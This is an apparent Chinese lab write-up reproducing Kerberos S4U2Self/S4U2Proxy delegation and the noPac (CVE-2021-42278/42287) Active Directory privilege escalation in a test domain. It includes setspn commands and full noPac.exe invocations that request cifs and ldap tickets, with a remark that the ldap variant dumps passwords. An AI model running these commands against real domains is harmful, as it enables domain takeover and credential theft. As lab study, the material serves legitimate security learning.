#S4U2SELF#S4U2Proxy#CVE-2021-42278/42287以及手动复现

目录

#S4U2SELF

Win08手动赋予委托服务属性

Win10身份验证

AS请求 

TGS请求

#S4U2Proxy 

申请其他服务 

#CVE-2021-42278/42287 


#S4U2SELF

s4u2 

@xwj456

可以看到普通用户是没用委托属性的 

Win08手动赋予委托服务属性

setspn -A wsw/wsw.com s4u2 

Win10身份验证

s4u2

@xwj456

AS请求 

两个勾

两个勾和include-pac记得按上(蓝色) ,发包之前把wireshark打开,方便记录和排查

TGS请求

上面四个勾+下面两个勾

#S4U2Proxy 

申请其他服务 

Win08添加

添加cifs

组策略管理 

注意这里是用户s4u2

成功添加

请求之前打开wireshark

AS请求(同上)

第一次TGS请求(同上)

第二次TGS请求 

include-pac按掉,S4U2SELF不要勾 

最后生成的那个票据重命名proxy,复制到工具里

#CVE-2021-42278/42287 

noPac.exe
noPac.exe -domain test.com -user krbuser -pass @xwj123 /dc WIN-8RSOOTMELL5.test.com /mAccount demohb /mPassword @xwj123 /service cifs /ptt

(黄色部分每次都要改一改,创建不同的计算机账户)

cifs只能访问C盘 

noPac.exe -domain test.com -user krbuser -pass @xwj123 /dc WIN-8RSOOTMELL5.test.com /mAccount demohb3 /mPassword @xwj123 /service ldap /ptt 

 这个可以把密码荡下来

手动复现

 

域用户用域控发包

  

这里可以找到它的域控

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值